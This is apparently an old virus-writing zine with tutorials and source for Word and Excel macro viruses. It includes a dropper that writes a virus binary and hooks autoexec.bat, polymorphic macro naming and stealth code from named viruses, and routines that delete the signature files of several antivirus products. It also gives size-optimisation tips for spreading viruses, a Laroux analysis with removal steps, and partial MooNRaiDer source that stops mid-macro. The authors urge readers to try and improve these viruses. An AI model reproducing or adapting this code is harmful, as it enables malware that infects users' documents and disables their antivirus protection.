Print #1, "E 1720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17E0 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "RCX"
Print #1, "16EC"
Print #1, "W"
Print #1, "Q"
Print #1, ""
Close #1
'Create a file called c:\dos\exec.bat for putting in all
'the things that are behind "print #1" till "close #1"
'is found.
Open "c:\dos\exec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "debug < script.scr>nul"
Print #1, "rem debugger.com"
Print #1, "echo @c:\dos\debugger.exe>>c:\autoexec.bat"
Print #1, "del c:\dos\script.scr"
Print #1, "del c:\dos\exec.bat"
Close #1
SetAttr "c:\autoexec.bat", 0 'Set the atribute of c:\autoexec.bat...
'to nothing.
ChDir "C:\DOS"
Shell "EXEC.BAT", 0
ChDir "C:\"
NoDropper:
----------------------------------------------------------------
The above is a piece of a Nemesis macro and it opens debug to
create a file (debugger.exe) containing the Neurobasher.b virus.
The numbers are the hex codes of the Neurobasher.b virus.
Then a file called "c:\dos\exec.bat" is created and it contains
everything behind the "print #1" until "close #1" is found. After
that's done the virus will change the attributes of "c:\autoexec.bat"
to editable (not readonly).
And finally the virus will change to the directory "c:\dos" and
executes the "exec.bat" file that was created earlier, after that
the virus will change to the "c:\" directory.
So the next time you start your computer the Neurobasher.b virus
will be loaded. Have fun trying this out ;-)
--- Neophyte ---
POLYFORMISM IN MACRO VIRII
--------------------------
If you don't know what polymorfism is: it's a sort of encryption
of a virus, but one that changes the encryption routine every
infection.
I hope you got it now, but if you don't I'll say it again:"I'm not
an english teacher so fuck it if you can't follow me."
The above descryption of polymorfism is mainly mend for dos (assembler)
virii. With macro virii it is a bit different.
As you probably know a macro virii contains macros (duh...) and as
you probably know, those macros have names (duh...). Several AV
products look for those names to identify if a file is infected. So
the only thing that is to be done is create different names every
infection. That's easier said then done, believe me.
The very first polymorfic macro virus created was the Outlaw virus.
It was created by the Nightmare Joker from SLAM. The Outlaw source
for creating random macro names is put down here. I think it's quite
complicated so I give a full explanation of it beside the source.
For the complete Outlaw virus see "macro viruses".
'This is the macro that infects the Normal.dot
----------------------------------------------------------------
Sub MAIN
On Error Goto Done 'Error handler.
A$ = FileName$() 'A$ = active filename.
If A$ = "" Then Goto Finish 'If no file active goto finish.
If CheckInstalled = 0 Then 'Already installed?...
Routine 'No then goto Sub Routine,
Crypt 'Sub Crypt, Sub PayLoadMakro,
PayloadMakro 'etc.
FileSaveAll 1, 1
Else 'Yes (already installed).
Goto Done 'Goto done.
End If
Done: 'Done (already installed).
A$ = FileName$() 'A$ = active filename.
If A$ = "" Then 'If no file active goto finish.
Goto Finish
Else 'If a file is active,
Insert " " 'insert a "space", for infecting
'the active file.
End If
Finish: 'Finish (no file active).
End Sub
Sub Crypt 'The Sub Crypt.
One = 7369 'Number one is 7369.
Two = 9291 'Number two is 9291.
Num = Int(Rnd() * (Two - One) + One) 'generate random number.
A$ = Str$(Num) 'A$ is generated number.
A$ = LTrim$(A$) 'Delete the empty space before...
'the number. The empty space is...
'for making the number negative,
'e.g. -7369.
Beginn = Hour(Now()) 'Beginn is the active hour.
B$ = Str$(Beginn) 'B$ is the active hour (string).
B$ = LTrim$(B$) 'Delete the empty space in B$.
If B$ = "1" Then C$ = "A" 'If B$ is 1 (1 o'clock)...
'then C$ is A.
If B$ = "2" Then C$ = "B" 'If B$ is 2 (2 o'clock)...
'then C$ is B.
If B$ = "3" Then C$ = "C" 'If B$ is 3 (3 o'clock)...
'then C$ is C.
If B$ = "4" Then C$ = "D" 'Etc.
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
E$ = C$ + A$ 'E$ is C$ (character) plus...
'A$ (the generated number).
ZU$ = GetDocumentVar$("VirNameDoc") 'ZU$ is macro called VirNameDoc...
'Watch out:VirNameDoc is not...
'the real macro name, it's some...
'sort of string.
PG$ = WindowName$() + ":" + ZU$ 'PG$ is active filename plus...
'":" and plus macro name (ZU$).
MacroCopy PG$, "Global:" + E$ 'Copies macro from document...
'to global template, with...
'the name that was generated.
SetProfileString "Intl", "Name2", E$ 'Set the macro name in...
'win.ini. as "Intl", "Name2", E$.
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 0
'Creates short-cut with the...
'ascii keycode 69 (E). If the...
'E key is pushed the macro...
'E$ will be executed (The above...
'macro). With the .Add you tell...
'Word that you want to add that...
'function to the key not replace...
'it.
End Sub 'End the Sub Crypt
Sub Routine 'Begin Sub Routine
One = 7369 'This is practically...
Two = 9291 'the same as Sub Crypt.
Num = Int(Rnd() * (Two - One) + One) 'I will only explain the...
A$ = Str$(Num) 'things that aren't...
A$ = LTrim$(A$) 'explained above.
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
D$ = C$ + A$ 'The same as in Sub Crypt...
UZ$ = GetDocumentVar$("VirName") 'only with other names.
GP$ = WindowName$() + ":" + UZ$
MacroCopy GP$, "Global:" + D$
SetProfileString "Intl", "Name", D$
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0
'This one creates a short-cut...
'with the D$ macro (this macro)...
'if the spacebar (keycode 32)...
'is pushed.
End Sub
Sub PayloadMakro 'Same again.
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
K$ = C$ + A$ 'Again another name.
ZUZ$ = GetDocumentVar$("VirNamePayload")
GP$ = WindowName$() + ":" + ZUZ$
MacroCopy GP$, "Global:" + K$
SetProfileString "Intl", "Name3", K$ 'Only this time no...
'short-cut because this...
'is the payloadmacro and...
'this payload macro is only...
'executed on a special date...
'that is programmed in...
'another macro. For the...
'whole Outlaw virus, see...
'the virii section.
End Sub
Function CheckInstalled 'A function to check if...
'the virus already installed...
'the global template (Normal.Dot).
CC$ = GetProfileString$("Intl", "Name") 'CC$ is the name of the Routine...
'macro (Sub Routine).
CheckInstalled = 0 'Set the var checkinstalled to 0.
If CountMacros(0) > 0 Then 'If the number of macros in...
'Normal.Dot is greater then 0,
For i = 1 To CountMacros(0) 'then create a for...next loop...
'that loops the number of macros.
If MacroName$(i, 0) = CC$ Then 'If the macro name in...
CheckInstalled = 1 'Normal.dot is CC$ (routine...
'macro) then set var...
'CheckInstalled to 1.
End If 'Ends the If instruction.
Next i 'All macros done? then...
'continue. Else go back to...
'for...next loop.
End If 'Ends the If instruction.
End Function 'The end of the function.
----------------------------------------------------------------
This is one macro from the Outlaw virus. To get the names of the
macros, to use them in other macros, just use:
CC$ = GetProfileString$("Intl", "Name")
CC$ can be any string name you want but make sure to use the right
name you gave to the macro, in this example "Intl" and "Name".
Viewture & Optimization
-----------------------
A thing that could happen with the way this polymorphic name is
generated is that you get 2 same names, OK it's obvious that it
won't happen often but you never know. To correct this problem you
can use the following code:
Sub Crypt
One = 1
Two = 1000
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
-------------------------
Sub Routine
One = 1001
Two = 2000
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
And so on...
As you see I used different numbers so ou couldn't get a same name. You
can also use different characters for the first letter.
Another thing is, that the virus checks for the time to generate
the first letter. It could be better to randomly generate the
first letter. That is fixed easily, just create a second random
number generator that generates a number between 1 and 24.
And for the future......
--- Neophyte --- and some help from NJ
DIFFERENT STEALTH TECHNIQUES IN MACRO VIRII
-------------------------------------------
I wasn't planning to make something real big from this so it's
probably a bit short. You'll get a few examples but that's it.
Most of the time the macros that take care of the stealth technique
are named ToolsMacro (In the English version of Word) because if
it's put in ToolsMacro it's automatticly executed when the user
selects Tools-->Macro from the menu.
Here are a couple examples:
-----------------------------------------------------------
Sub MAIN
On Error Goto ErrorRoutine
OldName$ = NomFichier$()
If macros.bDebug Then
MsgBox "start ToolsMacro"
Dim dlg As OutilsMacro
If macros.bDebug Then MsgBox "1"
GetCurValues dlg
If macros.bDebug Then MsgBox "2"
On Error Goto Skip
Dialog dlg
OutilsMacro dlg
Skip:
On Error Goto ErrorRoutine
End If
REM enable automacros
DisableAutoMacros 0
macros.SavToGlobal(OldName$)
macros.objectiv
Goto Done
ErrorRoutine:
On Error Goto Done
If macros.bDebug Then
MsgBox "error " + Str$(Err) + " occurred"
End If
Done:
End Sub
-----------------------------------------------------------
This one is from 'the macro virus writing tuturial' from Dark Night.
Or you could use:
-----------------------------------------------------------
Sub MAIN
Dim dlg As OutilsMacro
GetCurValues dlg
On Error Resume Next
Diag$ = "0"
Section$ = "Compatibility"
wininistr$ = "0x0020401"
ProfileName$ = "RR2CD"
PrintText$ = "Brought to you by the Nemesis Corporation, 1996"
Password$ = Chr$(120) + Chr$(101) + Chr$(110) + Chr$(105) + Chr$(120) + Chr$(111) + Chr$(115)
NoVir$ = GetProfileString$(Section$, ProfileName$)
If (NoVir$ = wininistr$) Or (diag$ = "1") Then
Dialog dlg
OutilsMacro dlg
Else
MsgBox "This option is not available right now.", "Warning", 48
End If
End Sub
-----------------------------------------------------------
This one is from the Nemesis (Xenixos) virus. I've changed it
a bit.
And finally to give another example, from the MooNRaiDer virus.
-----------------------------------------------------------
Sub MAIN
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot"
Begin Dialog UserDialog 442, 320, "Macro"
PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2
CancelButton 290, 43, 141, 21
PushButton 290, 72, 141, 21, "&Run", .Definierbar3
PushButton 290, 102, 141, 21, "&Edit", .Definierbar4
PushButton 290, 130, 141, 21, "&Delete", .Definierbar5
PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .Text1
Text 7, 259, 109, 13, "Descr&iption:", .Text2
Text 7, 6, 93, 13, "Macros:", .Text3
ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
End Dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x
Case 0
Cancel
Case 1
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 2
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 3
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 4
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 5
MsgBox "Not enough memory", "WordBasic Err = 7"
End Select
End Sub
-----------------------------------------------------------
Ok, I know it isn't anything more then just some stolen macros
but maybe you get some inspiration from this and you will end up
creating the perfect macro virus, who knows...
--- Neophyte ---
ANTI-ANTI-VIRUS (RETRO) IN MACRO VIRII
--------------------------------------
It's quite simple to attack Non-Resident Anti-virus software,
just delete or rename a specific file and your AV progi won't
work anymore. Most of the time the user will reinstall the product
so if you put a line in autoexec.bat that deletes or renames the
file if it exists again the technique is quite useful. But I didn't
discovered yet how to avoid the memory-resident AV software.
Here is some example I used in my Puritan (1) virus. The Puritan (1)
virus is just a bad rip off concept virus, but with retro techniques
and simple stealth, but eh don't blame me for having two days time to
create a virus and a new technique so the virus contains some bugs,
but the virus will be continued. There's the (1) for.
Here is a piece of the Puritan (1) virus to demonstrate a new
technique to attack non-resident AV software.
'-----------------------------------------------------------
'The AutoOpen macro.
'This is used for executing the Retro Macro, the macro with
'the retro technique in it. It will only be executed one time,
'At infection, because if Normal.Dot is already infected the
'macro will jump to Z and will not execute the Retro Macro again.
'This retro technique is only used for AV software in Win95 because
'I hadn't the time to get other AV progi's and to add them. Check
'the VBB magazine's for more from this.
'-----------------------------------------------------------
Sub MAIN
On Error Goto Z 'This is actually the same...
iM = CountMacros(0, 0) 'as the concept virus. For...
For i = 1 To M 'a full explained Puritan (1)...
If M$(i, 0, 0) = "Puritan" Then Y = - 1
End If 'virus, choose virii--->Puritan(1).
Next i
If Not Y Then
F$ = WindowsName$()
S$ = F$ + ":Puritan"
MacroCopy S$, "Global:Puritan"
S$ = F$ + ":Rtr"
MacroCopy S$, "Global:Retro"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FileSaveAs"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FSAB"
S$ = F$ + ":AOB"
MacroCopy S$, "Global:AOB"
S$ = F$ + ":ToolsMacro"
MacroCopy S$, "Global:ToolsMacro"
End If
ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
'This will execute the macro Retro in Normal.Dot.
Z:
End Sub
'---------------
'The Retro Macro
'---------------
Sub MAIN
'Norton AntiVirus
On Error Goto 'Error Handler.
VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
'VF$ (Virus File) is Virscan.dat.
If Files$(VF$) = "" Then Goto a 'If VF$ (Virscan.dat) doesn't...
'exists goto a.
SetAttr VF$, 0 'If it exists set the attributes...
'to zero (no attributes).
Kill VF$ 'Then delete the file.
'The next time you will start...
'your AV progi it cannot scan...
'any files.
a:
On Error Goto c 'Error Handler.
AB$ = "C:\Autoexec.bat" 'AB$ (AutoExec.bat) is C:\Autoexec.bat.
If Files$(AB$) = "" Then Goto c 'If AB$ (AutoExec.bat) doesn't...
'exists goto c.
SetAttr AB$, 0 'If it exists set the attributes...
'to zero (no attributes).
Open AB$ For Append As #1 'Then open AB$ (AutoExec.bat)...
'for appending.
Print #1, "@echo off" 'Put the line "@Echo Off" at the...
'end of the AutoExec.bat.
Print #1, "IF exist " + VF$ + " then del " + VF$
'Then Put the line 'IF exist...
'"C:\Program Files\Norton AntiVirus\
'Virscan.dat" then del "C:\Program
'Files\Norton AntiVirus\Virscan.Dat"
Close #1 'Close the AutoExec.bat
'----------------------------
'F-PROT W95
c: 'This is just the same as above...
On Error Goto d 'Only with F-PROT for W95.
VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
If Files$(VF$) = "" Then Goto d
SetAttr VF$, 0
Kill VF$
d:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto f
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
'----------------------------
'MCAFEE W95
f:
On Error Goto g
VF$ = "C:\Program Files\McAfee\Scan.dat"
If Files$(VF$) = "" Then Goto g
SetAttr VF$, 0
Kill VF$
g:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto h
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
'----------------------------
'TBAV W95
h:
On Error Goto i
VF$ = "C:\Tbavw95\Tbscan.sig"
If Files$(VF$) = "" Then Goto i
SetAttr VF$, 0
Kill VF$
i:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto j
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
J:
Z:
End Sub
'----------------------------------------------------------
Ok, yet it's only for 4 AV-programs but I know you can make lots
of more routines such as these. But if you cannot watch out for our
next issue and in the meantime make sure to look at the VBB magazines
for more from us about this.
If anyone has an idea how to defeat TSR-AV programs e-mail me.
The_Neophyte@Hotmail.com
--- Neophyte ---
HOW TO OPTIMIZE YOUR MACRO VIRII
--------------------------------
Ok, this one may not be very long but I think it's effective
enough to put it in here.
As with every sort of virus there is a rule that if something is
smaller it will go faster. With macro virii it doesn't really matter
how fast the virus works because when you work on a Pentium 166 with
a load of memory you will not notice the virus is even active, but
there are other reasons to make your virus smaller. For instance,
If your virus is 10k big and it infects a journalists network, and
all the journalists together will create 250 documents in a day I'm
sure somebody will notice that in 10 days the harddisk space is
increased with 25 megabyte, so if you can make your virus 9k big
the lost harddisk space in 10 days is only 22,5 megabytes.
2,5 megabytes with just 1k decreasement.
I hope you get the point, now I will give you a couple things to
decrease your virus length with.
Never put any comments in the actual virus, I mean, don't put
any comments in the virus you will spread. If you put a virus in
a magazine or something, it's better to put comments in it.
-----------------------------
Also, use as much strings as possible. I've tested it with a simple
test:
Create an empty template, and create a macro in that template.
Now delete the Sub Main and End Sub commands and type a line like this:
'Welcome to the SLAM magazine issue 1, the Document X'
Then select the line and use copy and paste to copy the line for
about 50 times. When that's done select all the 50 lines and use
the edit-->copy command. Then save the template with the macro
as 'Test1.dot'.
Then create a second empty template and also create a macro in that
template and delete the Sub Main and End Sub commands. Then paste
the 50 lines to the empty macro. After that use the find replace command
and type at find: Welcome to the SLAM magazine issue 1, the Document X
and type at replace: A$
Check to see if every line is changed in A$.
then type this at the top of the macro:
A$ = "Welcome to the SLAM magazine issue 1, the Document X"
And finally save the template as Test2.dot.
Now go to dos and check the length of both files. See any differences?
And don't use long labels, see the following example:
In stead of using this:
-----------------------------------------------------------
Sub Main
CheckNumber = 0
Check_CheckNumber:
If CheckNumber = 5 then goto CheckNumber_is_5 else goto Checknumber_is_not_5
CheckNumber_is_not_5:
CheckNumber = CheckNumber + 1
goto Check_Checknumber
CheckNumber_is_5:
MsgBox "CheckNumber is 5", "Finished"
End Main
-----------------------------------------------------------
You could use this:
-----------------------------------------------------------
Sub Main
C = 0
F:
If C = 5 then goto A else goto B
B:
C = C + 1
goto F
A:
MsgBox "CheckNumber is 5", "Finished"
End Main
-----------------------------------------------------------
You got it now? Ok, it won't make your virus more readable with it
but it's smaller. And what the fuck do you care if some AV-pussy can't
understand it :)
I think you can make up other things to decrease
the size of your virus.
Be creative.....
--- Neophyte ---
WORD.EXCEL.LAROUX
-----------------
A year after the first widespread Microsoft Word macro virus, the
first real Microsoft Excel macro was found in July 1996. Word macro
viruses have demonstrated that viruses spreading in macro format inside
document files can spread far and wide: WordMacro/Concept is the most
commonly reported virus in the world. The first Excel macro virus was
named ExcelMacro/Laroux.
Once the Excel environment has been infected by this virus, the virus
will always be active when Excel is loaded and will infect any new Excel
workbooks that are created as well as old workbooks when they are accessed.
The virus spreads from a machine to another when XLS files are exchanged
over a local network, over the internet, in e-mail or on diskettes.
ExcelMacro/Laroux was written in Visual Basic for Applications (VBA). This
is a macro language based on the Visual Basic language from Microsoft. This
virus is be able to operate under Excel 5.x and 7.x under Windows 3.x, Windows 95
and Windows NT. This virus does not work under any version of Excel for Macintosh
or Excel 3.x or 4.x for Windows. It also fails under some localized versions of
Excel, but works fine under other (for example, it won't work under French Excel,
but replicates fine under Finnish Excel). This depends on how the translation is done.
ExcelMacro/Laroux consists of two macros, auto_open and check_files. The auto_open
macro executes whenever an infected Spreadsheet is opened, followed by the check_files
macro which determines the startup path of Excel. If there is no file named PERSONAL.XLS
in the startup path, the virus creates one. This file contains a module called "laroux".
PERSONAL.XLS is the default filename for any macros recorded under Excel. Thus you might
have PERSONAL.XLS on your system even though you are not infected by this virus. The
startup path is by default set as \MSOFFICE\EXCEL\XLSTART, but it can be changed from
Excel's Tools/Options/General/Alternate Startup File menu option.
If an infected workbook resides on a write-protected floppy, an error will occur when Excel
tries to open it and the virus will not be able to replicate.
ExcelMacro/Laroux is not intentionally destructive and contains no payload; it just replicates.
Detecting ExcelMacro/Laroux manually
------------------------------------
Select Tools/Macro from Excel menus. If you find the macros auto_open, check_files,
PERSONAL.XLS!auto_open and PERSONAL.XLS!check_files (and possibly 'bookname'!auto_open
and 'bookname'!check_files from any infected workbook you have open), infection is likely.
Re-check this by selecting the Window/Unhide menu and unhide the Personal file.
This should make the Personal sheet visible, with text laroux in in the sheet tab.
To disinfect Laroux, delete these macros and exit Excel, saving all changes. Now Excel
itself is clean. Next, open all infected workbooks one by one, keeping the left shift
pressed down while opening them (according to Excel documentation, this bypasses
automacros, but unfortunately it doesn't seem to always work). Then open Tools/Macro
and delete the virus macros and re-save the file.
-------------------------------------------------------------
Macro.Excel.Laroux
This virus infects Excel sheets (XLS files). It contains two macros: auto_open and
check_files. While loading an infected document Excel executes auto macros auto_open,
and the virus receives the control. The virus auto_open macro contains just one command
that defines the check_files macro as a handler of OnSheetActivate routine. As a result
the virus hooks the sheet activate routine, and while opening a sheet the virus
(the check_files macro) receives the control.
When the check_files macro receives the control, it searches for the PERSONAL.XLS files
in the Excel Startup directory and checks the count of modules in the current Workbook.
If the infected macro is an active Workbook, and the PERSONAL.XLS file does not exist in
the Excel Startup directory (the virus is executed for the first time), the virus creates
that file there and saves its code to that file by using the SaveAs command. When Excel is
loading its modules for the next time, it automatically loads all XLS files from the Startup
directory. As a result, the infected PERSONAL.XLS is loaded as well as other files, the virus
receives the control and hooks the sheet activation routine.
If the active macro is not infected (there are no modules in the active Workbook) and the
PERSONAL.XLS file exists it the Excel directory, the virus copies its code to the active
Workbook. As a result the active Workbook gets infection.
To check your system for the virus one should to check PERSONAL.XLS and other XLS files for
the string "laroux" that presents in infected sheets.
--- Aurodreph ---
[ WordMacro. MooNRaiDer ]�������������������������������������������������������
� VIRUSNAME: MooNRaiDer
� SIZE: 14806 Bytes (5 Makros)
� ORIGIN: Germany
� AUTHOR: Nightmare Joker
->Polymorf Yes
->Stealth Yes
->Encrypted Yes, this file not but see virii.zip for encrypted version.
->Retro No
---------------------------------------------------------------------------
Macro SH8004
---------------------------------------------------------------------------
Sub MAIN
On Error Goto Done
A$ = FileName$() 'Is a file open?
If A$ = "" Then Goto Finish 'No, then goto end.
If CheckInstalled = 0 Then 'Is the normal.dot infected?
Routine 'If not, then call "Routine", "Crypt",
Crypt 'PayloadMakro and save all.
PayloadMakro
FileSaveAll 1, 1
Else 'If normal.dot is infected
Goto Done 'goto end.
End If
Done:
A$ = FileName$() 'If no file open goto end.
If A$ = "" Then
Goto Finish
Else 'A file is open and the user has pushed
Insert " " 'the Backspace Button. We must now insert
End If 'an empty field.
Finish: 'end.
End Sub
Sub Crypt
One = 7363
Two = 9294
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num) 'Generate now a new numba.
A$ = LTrim$(A$)
Beginn = Hour(Now()) 'Get the hour.
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AZ" 'If it's now 1 o'clock then C$ = "AZ"
If B$ = "2" Then C$ = "BY" 'and so on...
If B$ = "3" Then C$ = "CX"
If B$ = "4" Then C$ = "DW"
If B$ = "5" Then C$ = "EV"
If B$ = "6" Then C$ = "FU"
If B$ = "7" Then C$ = "GT"
If B$ = "8" Then C$ = "HS"
If B$ = "9" Then C$ = "IR"
If B$ = "10" Then C$ = "JQ"
If B$ = "11" Then C$ = "KP"
If B$ = "12" Then C$ = "LO"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NM"
If B$ = "15" Then C$ = "OL"
If B$ = "16" Then C$ = "PK"
If B$ = "17" Then C$ = "QJ"
If B$ = "18" Then C$ = "RI"
If B$ = "19" Then C$ = "SH"
If B$ = "20" Then C$ = "TG"
If B$ = "21" Then C$ = "UF"
If B$ = "22" Then C$ = "VE"
If B$ = "23" Then C$ = "WD"
If B$ = "00" Then C$ = "XC"
E$ = C$ + A$
ZU$ = GetDocumentVar$("VirNameDoc") 'Get the first macro name.
PG$ = WindowName$() + ":" + ZU$ 'Copy the macro to
MacroCopy PG$, "Global:" + E$ 'normal.dot.
SetProfileString "Intl", "Name2", E$ 'insert the macro name into win.ini
'Now prepare a combination between the Key "e" and the macro.
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$,
.Add, .Context = 0
End Sub
Sub Routine
One = 7363
Two = 9295
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num) 'Generate a new numba again.
A$ = LTrim$(A$)
Beginn = Hour(Now()) 'Get the hour.
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AZ" 'If it's 1 o'clock then C$ = "AZ"
If B$ = "2" Then C$ = "BY" 'and so on...
If B$ = "3" Then C$ = "CX"
If B$ = "4" Then C$ = "DW"
If B$ = "5" Then C$ = "EV"
If B$ = "6" Then C$ = "FU"
If B$ = "7" Then C$ = "GT"
If B$ = "8" Then C$ = "HS"
If B$ = "9" Then C$ = "IR"
If B$ = "10" Then C$ = "JQ"
If B$ = "11" Then C$ = "KP"
If B$ = "12" Then C$ = "LO"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NM"
If B$ = "15" Then C$ = "OL"
If B$ = "16" Then C$ = "PK"
If B$ = "17" Then C$ = "QJ"
If B$ = "18" Then C$ = "RI"
If B$ = "19" Then C$ = "SH"
If B$ = "20" Then C$ = "TG"
If B$ = "21" Then C$ = "UF"
If B$ = "22" Then C$ = "VE"
If B$ = "23" Then C$ = "WD"
If B$ = "00" Then C$ = "XC"
D$ = C$ + A$
UZ$ = GetDocumentVar$("VirName") 'Get the second macro name.
GP$ = WindowName$() + ":" + UZ$ 'Copy it again to normal.dot
MacroCopy GP$, "Global:" + D$
SetProfileString "Intl", "Name", D$ 'insert the name into the win.ini, too.
'Now prepare a combination between the second macro and the Backspace Button
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0
End Sub
Sub PayloadMakro
One = 7693
Two = 9216
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num) 'Generate a new numba for the third
A$ = LTrim$(A$) 'macro.
Beginn = Hour(Now()) 'Get the hour again.
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AZ" 'And if it's now 1 o'clock then
If B$ = "2" Then C$ = "BY" 'C$ = "AZ"
If B$ = "3" Then C$ = "CX" 'and so on...
If B$ = "4" Then C$ = "DW"
If B$ = "5" Then C$ = "EV"
If B$ = "6" Then C$ = "FU"
If B$ = "7" Then C$ = "GT"
If B$ = "8" Then C$ = "HS"
If B$ = "9" Then C$ = "IR"
If B$ = "10" Then C$ = "JQ"
If B$ = "11" Then C$ = "KP"
If B$ = "12" Then C$ = "LO"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NM"
If B$ = "15" Then C$ = "OL"
If B$ = "16" Then C$ = "PK"
If B$ = "17" Then C$ = "QJ"
If B$ = "18" Then C$ = "RI"
If B$ = "19" Then C$ = "SH"
If B$ = "20" Then C$ = "TG"
If B$ = "21" Then C$ = "UF"
If B$ = "22" Then C$ = "VE"
If B$ = "23" Then C$ = "WD"
If B$ = "00" Then C$ = "XC"
K$ = C$ + A$
ZUZ$ = GetDocumentVar$("VirNamePayload") 'so, we need the third macro name.
